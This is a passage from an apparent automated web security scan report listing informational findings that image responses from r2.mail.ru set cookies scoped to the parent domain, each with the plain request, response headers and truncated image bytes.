Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 1807
Connection: keep-alive
Set-Cookie: p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
16.68. http://r2.mail.ru/b12531545.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531545.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531545.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1374
Connection: keep-alive
Set-Cookie: p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...
16.69. http://r2.mail.ru/b12531624.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531624.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531624.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1811
Connection: keep-alive
Set-Cookie: p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...
16.70. http://r2.mail.ru/b12532203.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12532203.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12532203.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2157
Connection: keep-alive
Set-Cookie: p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
16.71. http://r2.mail.ru/b12752186.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752186.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752186.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 1841
Connection: keep-alive
Set-Cookie: p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
16.72. http://r2.mail.ru/b12752583.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752583.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752583.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 1772
Connection: keep-alive
Set-Cookie: p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
....................................<.<..................................    
.....................}........!1A..Qa."q.2....#B...R..$3br.    
.....
...[SNIP]...
16.73. http://r2.mail.ru/b12752584.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752584.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752584.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5872
Connection: keep-alive
Set-Cookie: p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...
16.74. http://r2.mail.ru/b12752585.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752585.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752585.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5320
Connection: keep-alive
Set-Cookie: p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...
16.75. http://r2.mail.ru/b12752586.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752586.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752586.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 4402
Connection: keep-alive
Set-Cookie: p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...
16.76. http://r2.mail.ru/b12855502.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12855502.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12855502.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 2692
Connection: keep-alive
Set-Cookie: p=8twGAErJFgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
16.77. http://r2.mail.ru/b12887675.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887675.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887675.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3685
Connection: keep-alive
Set-Cookie: p=QYwGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...
16.78. http://r2.mail.ru/b12887676.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887676.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887676.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3621
Connection: keep-alive
Set-Cookie: p=L/YGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...
16.79. http://r2.mail.ru/b12887677.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887677.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887677.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:35 GMT
Content-Type: image/jpeg
Content-Length: 3066
Connection: keep-alive
Set-Cookie: p=AtoGAEnndQAA; expires=Wed, 24-Apr-13 14:21:35 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:35 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...
16.80. http://r2.mail.ru/b12961140.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961140.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961140.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2105
Connection: keep-alive
Set-Cookie: p=wfsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...
16.81. http://r2.mail.ru/b12961154.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961154.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961154.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1321
Connection: keep-alive
Set-Cookie: p=XOcGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...
16.82. http://r2.mail.ru/b12961373.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961373.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961373.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2341
Connection: keep-alive
Set-Cookie: p=0+oGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................D.Z.."..............................
...[SNIP]...
16.83. http://r2.mail.ru/b12962356.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12962356.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12962356.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:29 GMT
Content-Type: image/jpeg
Content-Length: 2232
Connection: keep-alive
Set-Cookie: p=BPIGAGGvrgAA; expires=Wed, 24-Apr-13 14:21:29 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:29 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...
16.84. http://r2.mail.ru/b12963308.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12963308.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12963308.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1983
Connection: keep-alive
Set-Cookie: p=k+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...
16.85. http://r2.mail.ru/b12965362.jpg  previous  next

Summary

Severity:   Information
